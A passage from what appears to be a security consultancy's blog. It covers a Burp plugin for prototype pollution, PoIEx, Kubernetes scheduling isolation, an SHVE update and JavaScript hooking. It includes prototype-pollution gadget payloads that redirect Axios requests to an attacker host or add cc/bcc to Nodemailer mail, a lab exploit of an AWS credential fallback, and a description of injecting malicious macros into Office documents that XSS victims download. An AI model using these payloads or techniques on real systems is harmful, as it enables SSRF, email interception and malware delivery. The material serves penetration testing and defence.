Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-band (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.
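
The poison, wait, and revert cycle described above could be organized along these lines. The sketch is an assumption about the general flow, not the plugin's implementation: sendJson and pollInteractions are injected stand-ins rather than Burp APIs, the request bodies and host are placeholders, and everything is kept synchronous for brevity where real network calls would be asynchronous.

```javascript
// Hypothetical driver for one gadget check. `sendJson` delivers a JSON body
// to the target and `pollInteractions` asks the OOB service whether the
// unique host was contacted.
function checkGadget({ sendJson, pollInteractions, poisonBody, cleanupBody, oobHost }) {
    sendJson(poisonBody);
    let hit = false;
    try {
        hit = pollInteractions(oobHost);
    } finally {
        // Always attempt to revert the poisoning, even if polling throws.
        sendJson(cleanupBody);
    }
    return hit;
}

// Toy in-memory stand-ins to exercise the flow.
const sent = [];
const result = checkGadget({
    sendJson: (body) => sent.push(body),
    pollInteractions: (host) => host === 'abc123.oob.example',
    poisonBody: '{"user":{"__proto__":{"baseURL":"https://abc123.oob.example"}}}',
    cleanupBody: '{"user":{"__proto__":{"baseURL":{}}}}',
    oobHost: 'abc123.oob.example',
});
console.log(result, sent.length);
```

Putting the cleanup request in a finally block reflects the goal stated above: the target should not stay poisoned if the detection step fails halfway.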

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}

Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.
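
As a rough illustration of how a gadget in this format might be prepared for sending, the sketch below substitutes the <URL> placeholder with a concrete out-of-band host. instantiateGadget is a hypothetical helper and the host name is a placeholder; the plugin's actual substitution logic may differ.

```javascript
// Replace every "<URL>" placeholder in a gadget's payload with a concrete
// out-of-band host. Works on the JSON text so nested values are covered.
function instantiateGadget(gadget, oobHost) {
    const payloadText = JSON.stringify(gadget.payload).split('<URL>').join(oobHost);
    return {
        description: gadget.description,
        payload: JSON.parse(payloadText),
        null_payload: gadget.null_payload,
    };
}

// An example gadget written in the format described above.
const gadget = {
    payload: { proxy: { protocol: 'http', host: '<URL>', port: 80 } },
    description: 'Sets a proxy to manipulate or intercept HTTP requests.',
    null_payload: { proxy: {} },
};

const ready = instantiateGadget(gadget, 'abc123.oob.example'); // placeholder host
console.log(JSON.stringify(ready.payload));
```

The template itself is left unmodified, so the same gadget definition can be reused with a fresh host for every injection point.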

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

Vulnerable Code Example:

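// Assumes an Express `app` and `const axios = require("axios")`
app.get("/get-api-key", async (req, res) => {
  try {
      const instance = axios.create({baseURL: "https://doyensec.com"});
      const response = await instance.get("/?api-key=<API_KEY>");
      // Relay the upstream response to the caller
      res.send(response.data);
  } catch (error) {
      // A failed upstream request ends up here
      res.status(500).send("500!");
  }
});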

Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

Gadget for Axios:

{
  "payload": {"baseURL": "https://<URL>"},
  "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
  "null_payload": {"baseURL": {}}
},
{
  "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
  "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
  "null_payload": {"proxy": {}}
}
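
The effect of the baseURL gadget can be illustrated without a running server. The sketch below uses a simplified stand-in for an HTTP client's configuration handling. It is not Axios's implementation, and Axios's real merge logic varies between versions; resolveUrl, the attacker host, and the SECRET value are assumptions made for the example.

```javascript
// Simplified stand-in for a client's config handling: a value found on the
// per-request config takes precedence over the instance defaults.
function resolveUrl(defaults, requestConfig) {
    const baseURL = requestConfig.baseURL !== undefined
        ? requestConfig.baseURL
        : defaults.baseURL;
    return new URL(requestConfig.url, baseURL).toString();
}

const defaults = { baseURL: 'https://doyensec.com' };
const requestConfig = { url: '/?api-key=SECRET' }; // no own baseURL

const before = resolveUrl(defaults, requestConfig);

// Simulate a process whose Object.prototype has been polluted by the gadget.
Object.prototype.baseURL = 'https://attacker.example';
const during = resolveUrl(defaults, requestConfig);

// Remove the pollution again so later lookups are unaffected.
delete Object.prototype.baseURL;
const after = resolveUrl(defaults, requestConfig);

console.log({ before, during, after });
```

Because the per-request object has no own baseURL, the lookup falls through to the polluted prototype, and the request carrying the API key is built against the attacker's host.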

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

Vulnerable Code Example:

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
      res.status(500).send('500!');
  } else {
      res.send('200 OK');
  }
});

Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

Gadget for Nodemailer:

{
  "payload": {"cc": "email@<URL>"},
  "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
  "null_payload": {"cc": {}}
},
{
  "payload": {"bcc": "email@<URL>"},
  "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
  "null_payload": {"bcc": {}}
}

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Introducing PoIEx - Points Of Intersection Explorer

2024-01-30T00:00:00+01:00

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code, allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on GitHub.

Nowadays, cloud-oriented solutions are no longer a buzzword. Cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so-called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec we have solved this issue with PoIEx. The extension enhances VSCode with all the features required to efficiently perform code reviews, such as advanced collaboration capabilities, note taking using the VS Code Comments API and integration with Semgrep. This also allows it to be used as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes on any code location without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

👨‍💻 PoIEx as a standalone Semgrep extension for VSCode

PoIEx also works as a standalone VSCode extension for Semgrep. PoIEx allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode “Problems” tab.

Moreover, by right-clicking an issue, it is possible to apply a flag and update its status to ❌ false positive, 🔥 hot or ✅ resolved. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to set up custom arguments for Semgrep. As an example, we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and make Semgrep use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected to the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code:

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If aws_config.Credentials is set to nil because of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the latest release from GitHub and contribute with a star, bug reports or suggestions.

Kubernetes Scheduling And Secure Design

2024-01-23T00:00:00+01:00

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

nodeSelector field matching against node labels;
nodeName and namespace fields, basic and effective;
Affinity and anti-affinity, constraints type expansion for inclusion and repulsion;
Inter-pod affinity and anti-affinity, which match on pod labels instead of node labels when dealing with inclusion and repulsion;
Taints and Tolerations, allowing a node to repel or tolerate a pod being scheduled;
Pod topology spread constraints, based on regions, zones, nodes, and other user-defined topology domains;
A custom scheduler, tailored to your security needs.

Mechanisms for Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorizations may lead to privileged pods sharing the node with pods having PII data mounted or a different security risk level.

1. nodeSelector

It is the simplest of the constraints: you just specify the target node labels inside the pod specification.

Example pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeselector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on nodes matching all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.
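To make the AND semantics concrete, the following JavaScript sketch models how a nodeSelector is compared against node labels. It is only an illustration: the function name matchesNodeSelector, the node names and the disk label are assumptions made up for this example and are not part of Kubernetes.

```javascript
// Toy model of nodeSelector matching: every selector entry must be present
// on the node with exactly the same value (AND logic).
function matchesNodeSelector(nodeLabels, nodeSelector) {
    return Object.entries(nodeSelector).every(
        ([key, value]) => nodeLabels[key] === value
    );
}

// Hypothetical nodes and labels, for illustration only.
const nodes = [
    { name: "node-a", labels: { myLabel: "myvalue", disk: "ssd" } },
    { name: "node-b", labels: { myLabel: "myvalue" } },
];

const selector = { myLabel: "myvalue", disk: "ssd" };

const eligible = nodes
    .filter((node) => matchesNodeSelector(node.labels, selector))
    .map((node) => node.name);

console.log(eligible);
```

In this model only node-a is eligible, since node-b lacks the disk label. If no node carried both labels, a pod with this selector would stay pending.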

2. nodeName

If the nodeName field in the Spec is set, the kube-scheduler ignores the pod, and the kubelet on the named node attempts to run it.

In that sense, nodeName overrides other scheduling rules (e.g., nodeSelector, affinity, anti-affinity, etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

The pod will not run if the node in the spec is not running or if it is out of resources to host it
Cloud environments like AWS’s EKS come with unpredictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De facto, such an approach invalidates all the computational efficiency benefits of the scheduler, and it should only be applied to small, easy-to-manage groups of critical workloads.

3. Affinity & Anti-affinity

The NodeAffinity feature lets you specify rules for pod scheduling based on characteristics or labels of nodes. These rules can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard):

preferredDuringSchedulingIgnoredDuringExecution indicates a soft rule. The scheduler will try to adhere to this rule, but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging.
requiredDuringSchedulingIgnoredDuringExecution indicates a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing a node with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            - segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either a p0 or p1 workloadtype (custom strategy).

Multiple operators are available; NotIn and DoesNotExist are the ones used to obtain node anti-affinity. From a security standpoint, only hard rules requiring the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should be used for computational configurations that cannot affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity constrain which nodes the pods can be scheduled on, based on the labels of pods already running on that node.
As specified in the Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase
      topologyKey: kubernetes.io/hostname

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together. In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity: applied to a node, they make it repel every pod that does not explicitly tolerate them.

Tolerations are applied to pods and allow the scheduler to place them on nodes with matching taints. It should be highlighted that while tolerations allow scheduling, they do not guarantee it.

Each taint also defines an effect: NoExecute (also affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels, and its hard effects leave no flexibility to the scheduler.
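The matching between taints and tolerations can be modeled in a few lines of JavaScript. This is a simplified sketch of the documented rules (key, operator, value and effect), not the scheduler’s actual code; the function names tolerates and blockingTaints and the sample workload taint are assumptions for illustration.

```javascript
// Does a single toleration match a single taint?
function tolerates(toleration, taint) {
    // A toleration without an effect matches every effect.
    if (toleration.effect && toleration.effect !== taint.effect) return false;
    const operator = toleration.operator || "Equal";
    if (operator === "Exists") {
        // An empty key combined with Exists tolerates every taint.
        return !toleration.key || toleration.key === taint.key;
    }
    return toleration.key === taint.key &&
        (toleration.value || "") === (taint.value || "");
}

// Taints that prevent scheduling: untolerated ones with a hard effect.
// PreferNoSchedule is only a preference, so it never blocks.
function blockingTaints(node, pod) {
    const tolerations = pod.tolerations || [];
    return node.taints.filter(
        (taint) =>
            taint.effect !== "PreferNoSchedule" &&
            !tolerations.some((toleration) => tolerates(toleration, taint))
    );
}

// Hypothetical node reserved for critical workloads.
const criticalNode = {
    taints: [{ key: "workload", value: "critical", effect: "NoSchedule" }],
};
const plainPod = { tolerations: [] };
const criticalPod = {
    tolerations: [
        { key: "workload", operator: "Equal", value: "critical", effect: "NoSchedule" },
    ],
};

console.log(blockingTaints(criticalNode, plainPod).length);
console.log(blockingTaints(criticalNode, criticalPod).length);
```

In this model the plain pod is repelled by one taint, while the critical pod is allowed on the node. Being allowed is not the same as being placed there, which is why taints are usually paired with a node affinity rule when a workload must land on its reserved nodes.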

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler, which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that it does not know about. Writing a custom scheduler allows an organization to apply risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

Watches for unscheduled pods
Implements a scheduling algorithm to decide on which node the pod should run
Communicates the decision to the Kubernetes API server.
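As a rough illustration of those three steps, here is a toy, in-memory JavaScript model of a risk-based scheduling pass. It does not talk to the Kubernetes API: the pod fields privileged and sensitive, the node names and the functions pickNode and schedulePending are all hypothetical, and a real scheduler would watch the API server and create bindings instead of mutating local objects.

```javascript
// Step 2: the scheduling algorithm. The (assumed) risk rule is that a
// privileged pod never shares a node with a pod handling sensitive data.
function pickNode(pod, nodeNames, podsByNode) {
    const chosen = nodeNames.find((nodeName) =>
        (podsByNode[nodeName] || []).every(
            (other) =>
                !(pod.privileged && other.sensitive) &&
                !(pod.sensitive && other.privileged)
        )
    );
    return chosen || null;
}

function schedulePending(pods, nodeNames) {
    const podsByNode = {};
    const bindings = {};
    // Index pods that already run somewhere.
    for (const pod of pods.filter((p) => p.nodeName)) {
        podsByNode[pod.nodeName] = (podsByNode[pod.nodeName] || []).concat(pod);
    }
    // Step 1: look for pods that have no node assigned yet.
    for (const pod of pods.filter((p) => !p.nodeName)) {
        const nodeName = pickNode(pod, nodeNames, podsByNode);
        if (nodeName === null) continue; // no safe node: the pod stays pending
        // Step 3: record the decision (a real scheduler would post a binding).
        pod.nodeName = nodeName;
        podsByNode[nodeName] = (podsByNode[nodeName] || []).concat(pod);
        bindings[pod.name] = nodeName;
    }
    return bindings;
}

const bindings = schedulePending(
    [
        { name: "db", sensitive: true },
        { name: "agent", privileged: true },
        { name: "web" },
    ],
    ["node-1", "node-2"]
);

console.log(bindings);
```

With this input, the privileged agent pod is kept away from the node hosting the sensitive db pod, while the unclassified web pod can go anywhere.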

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies could be used to attract pods to, or repel them from, specific groups of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker perspective. In specific cases, the implemented mechanisms could be used to:

Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods, which are interesting to the attacker, by manipulating the labels of a controlled node.
- Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured, this could be abused with scheduling sections. An attacker able to submit pod Specs could use scheduling preferences to jump to a critical node.
- Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
- Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper with its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies label edits from the kubelet if the node-restriction.kubernetes.io/ prefix is present in the label.

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the Kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

Isolate critical namespaces/workloads on their own node group
Reserve a node for critical pods of each namespace
Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

Different teams, different trust level
It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.
Data being processed or stored
Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with less hardened workloads may expose the data to risk.
Exposed network services on the same node
Any pod that exposes a network service increases its attack surface. Pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.
Pod privileges and capabilities, or its assigned risk
Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment is identified, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the number of workloads in each isolation group can be evaluated and addressed by mixing the scheduling strategies, according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Office Documents Poisoning in SHVE

2023-11-03T00:00:00+01:00

Hello, folks! We’re back with an exciting update on Session Hijacking Visual Exploitation (SHVE) that introduces an insidious twist to traditional exploitation techniques using Office documents. We all know how Office documents laced with macros have been a longstanding entry point for infiltrating systems. SHVE now takes a step further by leveraging XSS vulnerabilities and the inherent trust users have in websites they regularly visit.

Our newest feature integrates the concept of Office document poisoning. Here’s how it works: SHVE allows you to upload templates for .docm, .pptm, and .xlsm formats. Whenever a victim of SHVE goes to download one of these document types, the tool will automatically intercept and inject the malicious macros into the file before it is downloaded. What makes this technique particularly sneaky is that the document appears completely normal to the user, maintaining the original content and layout. However, in the background, it executes the malicious payload, unbeknownst to the user.

This approach capitalizes on two critical aspects: the trust users have in documents they download from legitimate websites they visit, and the inherent dangers of macros embedded within Office documents. By combining these two elements, we create a subtle vector for delivering malicious payloads. It’s the wolf in sheep’s clothing, where everything looks as it should be, but the danger lurks within.

To provide a clear demonstration of this technique, we’ve prepared a video illustrating this Office document poisoning in action. Witness how a seemingly innocent download can turn into a nightmare for the end user.

As security researchers and ethical hackers, we need to constantly evolve and adapt our methods. With this update, SHVE not only allows for the exploitation of XSS vulnerabilities but also cleverly abuses the trust mechanisms users have built around their daily digital interactions. This enhancement is not just a step forward in terms of technical capability, but also a reminder of the psychological aspects of security exploitation.

We’re eager to see how the community will leverage these new features in their penetration testing and red teaming engagements. As always, we welcome contributions, and we’re looking forward to your feedback and insights. Stay safe, and happy hacking!

Client-side JavaScript Instrumentation

2023-09-25T00:00:00+02:00

There is a ton of code that is not worth your time and brain power. Binary reverse engineers commonly skip straight to the important code by using ltrace, strace, or frida. You can do the same for client side JavaScript using only common browser features. This will save time, make testing more fun and help keep your attention span available for the code that deserves your focus.

This blog introduces my thinking processes and practical methods for instrumenting client side JavaScript. These processes have helped me to find deeply embedded bugs in complicated codebases with relative ease. I have been using many of these tricks for so long that I implemented them in a web extension called Eval Villain. While I will introduce you to some of Eval Villain’s brand new features, I will also show how to get the same results without Eval Villain.

General Method and Thinking

Testing an application often raises questions as to how the application works. The client must know the answers to some of these questions if the application is to function. Consider the following questions:

What parameters does the server accept?
How are parameters encoded/encrypted/serialized?
How does the wasm module affect the DOM?
Where are the DOM XSS sinks and what sanitization is being applied?
Where are the post message handlers?
How is cross-origin communication between ads being accomplished?

For the web page to work, it needs to know the answer to these questions. This means we can find our answers in the JavaScript too. Notice that each of these questions implies the use of particular JavaScript functions. For example, how would the client implement a post message handler without ever calling addEventListener? So “Step 1” is hooking these interesting functions, verifying the use case is what we are interested in and tracing back. In JavaScript, it would look like this:

(() => {
    const orig = window.addEventListener;
    window.addEventListener = function(a, b) {
        if (a === "message") {
            console.log("postMessage handler found");
            console.log(b); // You can click the output of this to go directly to the handler
            console.trace(); // Find where the handler was registered.
        }
        return orig(...arguments);
    }
})();

Just pasting the above code in the console will work if the handler has not already been registered. However, it is crucial to hook the function before it’s even used. In the next section I will show a simple and practical way to always win that race.

Hooking native JavaScript is “Step 1”. This often helps you find interesting code. Sometimes you will want to instrument that code but it’s non-native. This requires a different method that will be covered in the “Step 2” section.
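The hook above generalizes to almost any function. As a minimal sketch, the helper below wraps a method in a Proxy, reports each call and forwards it unchanged. The names hookMethod and fakeWindow are mine, not part of any tool; fakeWindow is a stand-in object so the snippet also runs outside a browser.

```javascript
// Wrap owner[name] so every call is reported to onCall before being
// forwarded with its original `this` and arguments.
function hookMethod(owner, name, onCall) {
    const original = owner[name];
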